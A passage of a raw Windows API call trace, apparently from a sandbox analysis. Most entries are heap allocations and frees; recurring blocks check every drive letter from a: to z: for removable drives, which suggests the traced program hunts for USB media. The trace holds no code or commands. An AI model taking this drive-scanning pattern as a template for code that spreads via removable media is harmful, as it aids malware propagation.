(HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0212.368] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0212.368] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260c0 [0212.368] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0212.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0212.368] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0212.368] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0212.368] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260c0 | out: hHeap=0x12c0000) returned 1 [0212.368] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0212.368] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0212.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0212.369] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0212.369] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0212.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0212.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0212.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0212.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0212.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0212.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0212.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0212.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0212.369] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0212.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0212.369] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0212.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0212.369] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0212.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0212.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0212.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0212.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0212.369] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0212.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0212.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0212.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0212.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0212.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0212.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0212.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0212.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0212.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0212.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0212.370] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0212.370] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0212.370] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0212.391] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0212.614] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0212.615] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0212.615] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0212.615] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0212.615] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0212.615] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0212.616] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0212.616] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0212.616] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0212.616] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0212.617] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0212.617] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0212.617] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0212.617] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0212.617] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0212.618] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0212.618] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0212.618] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0212.618] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0212.618] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0212.619] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0212.619] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0212.619] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0212.619] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0212.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0212.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0212.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0212.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0212.620] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0212.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0212.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0212.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0212.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0212.620] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0212.623] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0212.623] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.623] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0212.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0212.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0212.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0212.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0212.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0212.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0212.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0212.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0212.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0212.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0212.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0212.624] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0212.624] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0212.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0212.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0212.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0212.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0212.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0212.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0212.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0212.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0212.624] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.624] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0212.624] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0212.624] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0212.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0212.625] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0212.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0212.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0212.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0212.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0212.625] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0212.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0212.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0212.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0212.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0212.625] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0212.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0212.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0212.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0212.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0212.625] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0212.625] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0212.625] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0212.625] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0212.626] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0212.626] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0212.626] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0212.626] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0212.626] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0212.626] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0212.626] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0212.626] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0212.627] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0212.627] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0212.627] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0212.627] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0212.627] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0212.627] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0212.627] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0212.628] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0212.628] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0212.628] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0212.628] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0212.629] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0212.629] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0212.629] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0212.629] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0212.630] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0212.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0212.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0212.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0212.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0212.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0212.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0212.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0212.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0212.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0212.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0212.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0212.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0212.630] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0212.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0212.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0212.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260a0 [0212.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0212.631] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0212.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0212.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0212.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260a0 | out: hHeap=0x12c0000) returned 1 [0212.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0212.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0212.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0212.631] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0212.631] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0212.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0212.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0212.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0212.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0212.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0212.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0212.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0212.632] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0212.632] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0212.632] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0212.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0212.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0212.632] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0212.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd370 [0212.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318de0 [0212.632] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0212.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0212.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0212.632] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0212.632] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0212.633] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0212.633] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0212.633] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0212.633] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0212.633] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0212.633] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0212.633] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0212.634] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0212.634] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0212.634] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0212.634] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0212.634] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0212.635] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0212.635] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0212.635] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0212.635] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0212.635] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0212.636] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0212.636] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0212.636] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0212.636] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0212.637] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0212.637] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0212.638] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0212.638] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0212.638] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0212.638] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.639] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0212.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0212.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0212.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326040 | out: hHeap=0x12c0000) returned 1 [0212.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0212.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0212.639] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0212.639] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0212.639] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0212.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318de0 | out: hHeap=0x12c0000) returned 1 [0212.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0212.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0212.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0212.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0212.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0212.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0212.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0212.639] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, 